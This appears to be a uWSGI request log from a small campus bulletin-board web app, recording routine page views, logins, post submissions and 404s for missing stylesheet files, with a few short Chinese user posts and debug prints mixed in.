/static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 33 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1755/2201] 180.160.49.168 () {38 vars in 879 bytes} [Thu Jan 14 11:39:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1756/2202] 180.160.49.168 () {38 vars in 769 bytes} [Thu Jan 14 11:39:04 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1757/2203] 180.160.49.168 () {38 vars in 771 bytes} [Thu Jan 14 11:39:04 2021] GET /static/css/spinners.css => generated 3516 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +zhiding +置顶 +[pid: 661|app: 0|req: 1758/2204] 180.160.49.168 () {48 vars in 973 bytes} [Thu Jan 14 11:39:15 2021] POST /admin-home/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1759/2205] 180.160.49.168 () {40 vars in 890 bytes} [Thu Jan 14 11:39:15 2021] GET /admin-home/ => generated 11262 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1760/2206] 180.160.49.168 () {38 vars in 835 bytes} [Thu Jan 14 11:39:15 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1761/2207] 180.160.49.168 () {38 vars in 847 bytes} [Thu Jan 14 11:39:15 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1762/2208] 180.160.49.168 () {38 vars in 803 bytes} [Thu Jan 14 11:39:15 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1763/2209] 180.160.49.168 () {38 vars in 879 bytes} [Thu Jan 14 11:39:15 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1764/2210] 180.160.49.168 () {38 vars in 771 bytes} [Thu Jan 14 11:39:15 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1765/2211] 180.160.49.168 () {38 vars in 839 bytes} [Thu Jan 14 11:39:15 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1766/2212] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 11:39:15 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1767/2213] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:39:15 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1768/2214] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 11:39:15 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1769/2215] 180.160.49.168 () {40 vars in 887 bytes} [Thu Jan 14 11:39:23 2021] GET /single/2/ => generated 9552 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2216] 180.160.49.168 () {40 vars in 815 bytes} [Thu Jan 14 11:39:23 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2217] 180.160.49.168 () {40 vars in 813 bytes} [Thu Jan 14 11:39:23 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1770/2218] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:39:25 2021] GET /home/ => generated 9659 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1771/2219] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:39:28 2021] GET /single-an-1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1772/2220] 180.160.49.168 () {40 vars in 887 bytes} [Thu Jan 14 11:39:28 2021] GET /single-an-1/ => generated 3087 bytes in 8 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1773/2221] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:39:31 2021] GET /single-an-2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1774/2222] 180.160.49.168 () {40 vars in 887 bytes} [Thu Jan 14 11:39:31 2021] GET /single-an-2/ => generated 3110 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1775/2223] 180.160.49.168 () {40 vars in 881 bytes} [Thu Jan 14 11:39:36 2021] GET /all-0-0-0 => generated 10496 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2224] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:39:36 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1776/2225] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 11:39:52 2021] GET /ownpublish-0-0-0 => generated 9961 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1777/2226] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:39:55 2021] GET /ownpublish-0-0-0 => generated 9961 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1778/2227] 180.160.49.168 () {40 vars in 890 bytes} [Thu Jan 14 11:40:17 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +有人打羽毛球吗? 下午想去打羽毛球,有小伙伴吗? +[pid: 661|app: 0|req: 1779/2228] 180.160.49.168 () {48 vars in 1061 bytes} [Thu Jan 14 11:40:44 2021] POST /publish/ => generated 0 bytes in 26 msecs (HTTP/1.1 302) 7 headers in 202 bytes (2 switches on core 0) +[pid: 661|app: 0|req: 1780/2229] 180.160.49.168 () {42 vars in 913 bytes} [Thu Jan 14 11:40:44 2021] GET /single/5 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1781/2230] 180.160.49.168 () {42 vars in 915 bytes} [Thu Jan 14 11:40:44 2021] GET /single/5/ => generated 9487 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1782/2231] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:40:49 2021] GET /all-0-0-0 => generated 10910 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2232] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:40:49 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1783/2233] 180.160.49.168 () {40 vars in 883 bytes} [Thu Jan 14 11:40:59 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1784/2234] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:41:02 2021] GET /single/2/ => generated 9552 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +[] +[pid: 661|app: 0|req: 1785/2235] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:42:03 2021] GET /all-4-0-0 => generated 9757 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[] +[pid: 661|app: 0|req: 1786/2236] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:42:05 2021] GET /all-3-0-0 => generated 9364 bytes in 37 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +[] +[pid: 661|app: 0|req: 1787/2237] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:42:06 2021] GET /all-5-0-0 => generated 9787 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[] +[pid: 661|app: 0|req: 1788/2238] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:42:07 2021] GET /all-3-0-0 => generated 9364 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1789/2239] 180.160.49.168 () {40 vars in 883 bytes} [Thu Jan 14 11:42:13 2021] GET /publish/ => generated 5234 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +元旦放假 据不靠谱小道消息:1~3日放假 +[pid: 661|app: 0|req: 1790/2240] 180.160.49.168 () {48 vars in 1061 bytes} [Thu Jan 14 11:43:01 2021] POST /publish/ => generated 0 bytes in 38 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1791/2241] 180.160.49.168 () {42 vars in 913 bytes} [Thu Jan 14 11:43:01 2021] GET /single/6 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1792/2242] 180.160.49.168 () {42 vars in 915 bytes} [Thu Jan 14 11:43:02 2021] GET /single/6/ => generated 9435 bytes in 44 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1793/2243] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:43:04 2021] GET /all-0-0-0 => generated 11383 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2244] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:43:04 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +0 +[] +[pid: 661|app: 0|req: 1794/2245] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:43:12 2021] GET /all-8-0-0 => generated 9778 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[] +[pid: 661|app: 0|req: 1795/2246] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:43:14 2021] GET /all-7-0-0 => generated 9364 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +[] +[pid: 661|app: 0|req: 1796/2247] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:43:16 2021] GET /all-6-0-0 => generated 9757 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[] +[pid: 661|app: 0|req: 1797/2248] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:43:17 2021] GET /all-7-0-0 => generated 9364 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1798/2249] 180.160.49.168 () {40 vars in 899 bytes} [Thu Jan 14 11:43:48 2021] GET /ownpublish-0-0-0 => generated 11001 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1799/2250] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:43:51 2021] GET /ownpublish-0-0-0 => generated 11060 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1800/2251] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 11:43:53 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +[] +[pid: 661|app: 0|req: 1801/2252] 219.228.146.135 () {40 vars in 931 bytes} [Thu Jan 14 11:43:59 2021] GET /all-3-0-0 => generated 9737 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1802/2253] 180.160.49.168 () {40 vars in 884 bytes} [Thu Jan 14 11:43:59 2021] GET /home/ => generated 9659 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2254] 219.228.146.135 () {40 vars in 914 bytes} [Thu Jan 14 11:44:00 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +0 +[] +[pid: 661|app: 0|req: 1803/2255] 219.228.146.135 () {42 vars in 962 bytes} [Thu Jan 14 11:44:12 2021] GET /all-3-0-0 => generated 9737 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2256] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 11:44:13 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1804/2257] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 11:44:19 2021] GET /all-0-0-0 => generated 11360 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2258] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 11:44:19 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2259] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 11:44:19 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1805/2260] 180.160.49.168 () {38 vars in 834 bytes} [Thu Jan 14 11:44:52 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2261] 180.160.49.168 () {40 vars in 823 bytes} [Thu Jan 14 11:44:52 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2262] 180.160.49.168 () {40 vars in 845 bytes} [Thu Jan 14 11:44:52 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2263] 180.160.49.168 () {40 vars in 827 bytes} [Thu Jan 14 11:44:52 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2264] 180.160.49.168 () {40 vars in 825 bytes} [Thu Jan 14 11:44:52 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2265] 180.160.49.168 () {40 vars in 831 bytes} [Thu Jan 14 11:44:52 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2266] 180.160.49.168 () {40 vars in 806 bytes} [Thu Jan 14 11:44:52 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2267] 180.160.49.168 () {40 vars in 822 bytes} [Thu Jan 14 11:44:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2268] 180.160.49.168 () {40 vars in 820 bytes} [Thu Jan 14 11:44:52 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2269] 180.160.49.168 () {40 vars in 812 bytes} [Thu Jan 14 11:44:52 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2270] 180.160.49.168 () {40 vars in 804 bytes} [Thu Jan 14 11:44:52 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2271] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:44:52 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1806/2272] 180.160.49.168 () {48 vars in 967 bytes} [Thu Jan 14 11:45:00 2021] POST /login/ => generated 27 bytes in 26 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1807/2273] 180.160.49.168 () {40 vars in 882 bytes} [Thu Jan 14 11:45:00 2021] GET /home/ => generated 9635 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2274] 180.160.49.168 () {38 vars in 815 bytes} [Thu Jan 14 11:45:00 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1808/2275] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:45:05 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1809/2276] 180.160.49.168 () {40 vars in 887 bytes} [Thu Jan 14 11:45:05 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1810/2277] 180.160.49.168 () {40 vars in 904 bytes} [Thu Jan 14 11:45:10 2021] GET /ownpublish-0-0-0 => generated 9488 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2278] 180.160.49.168 () {40 vars in 831 bytes} [Thu Jan 14 11:45:10 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2279] 180.160.49.168 () {40 vars in 829 bytes} [Thu Jan 14 11:45:10 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1811/2280] 180.160.49.168 () {40 vars in 881 bytes} [Thu Jan 14 11:46:03 2021] GET /all-0-0-0 => generated 11383 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2281] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:46:03 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1812/2282] 180.160.49.168 () {48 vars in 1029 bytes} [Thu Jan 14 11:46:08 2021] POST /all-0-0-0 => generated 9723 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1813/2283] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:46:10 2021] GET /home/ => generated 9659 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1814/2284] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 11:47:47 2021] GET /all-0-0-0 => generated 11360 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2285] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 11:47:47 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2286] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 11:47:47 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1815/2287] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 11:47:49 2021] GET /all-0-0-0 => generated 11360 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2288] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 11:47:51 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1816/2289] 219.228.146.135 () {40 vars in 918 bytes} [Thu Jan 14 11:48:14 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1817/2290] 180.160.49.168 () {42 vars in 935 bytes} [Thu Jan 14 11:48:15 2021] GET /ownpublish-0-0-0 => generated 9488 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2291] 180.160.49.168 () {42 vars in 860 bytes} [Thu Jan 14 11:48:15 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1818/2292] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:48:28 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1819/2293] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:48:28 2021] GET /home/ => generated 9636 bytes in 20 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1820/2294] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:48:33 2021] GET /all-0-0-0 => generated 11360 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2295] 219.228.146.135 () {40 vars in 897 bytes} [Thu Jan 14 11:48:34 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1821/2296] 219.228.146.135 () {42 vars in 950 bytes} [Thu Jan 14 11:52:11 2021] GET /all-0-0-0 => generated 11609 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2297] 219.228.146.135 () {40 vars in 898 bytes} [Thu Jan 14 11:52:11 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2298] 219.228.146.135 () {42 vars in 882 bytes} [Thu Jan 14 11:52:12 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1822/2299] 219.228.146.135 () {40 vars in 923 bytes} [Thu Jan 14 11:52:18 2021] GET /all-0-0-0 => generated 11609 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1823/2300] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 11:56:15 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2301] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 11:56:15 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2302] 219.228.146.135 () {40 vars in 875 bytes} [Thu Jan 14 11:56:15 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2303] 219.228.146.135 () {40 vars in 850 bytes} [Thu Jan 14 11:56:15 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2304] 219.228.146.135 () {40 vars in 848 bytes} [Thu Jan 14 11:56:15 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2305] 219.228.146.135 () {40 vars in 866 bytes} [Thu Jan 14 11:56:15 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2306] 219.228.146.135 () {40 vars in 856 bytes} [Thu Jan 14 11:56:15 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2307] 219.228.146.135 () {40 vars in 908 bytes} [Thu Jan 14 11:56:16 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +123 123 +[pid: 661|app: 0|req: 1824/2308] 219.228.146.135 () {48 vars in 1100 bytes} [Thu Jan 14 11:56:27 2021] POST /publish/ => generated 0 bytes in 27 msecs (HTTP/1.1 302) 7 headers in 202 bytes (2 switches on core 0) +[pid: 661|app: 0|req: 1825/2309] 219.228.146.135 () {42 vars in 952 bytes} [Thu Jan 14 11:56:27 2021] GET /single/7 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1826/2310] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 11:56:27 2021] GET /single/7/ => generated 9061 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2311] 219.228.146.135 () {40 vars in 890 bytes} [Thu Jan 14 11:56:28 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2312] 219.228.146.135 () {40 vars in 872 bytes} [Thu Jan 14 11:56:28 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2313] 219.228.146.135 () {40 vars in 885 bytes} [Thu Jan 14 11:56:28 2021] GET /static/img/dianzan.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +here +[pid: 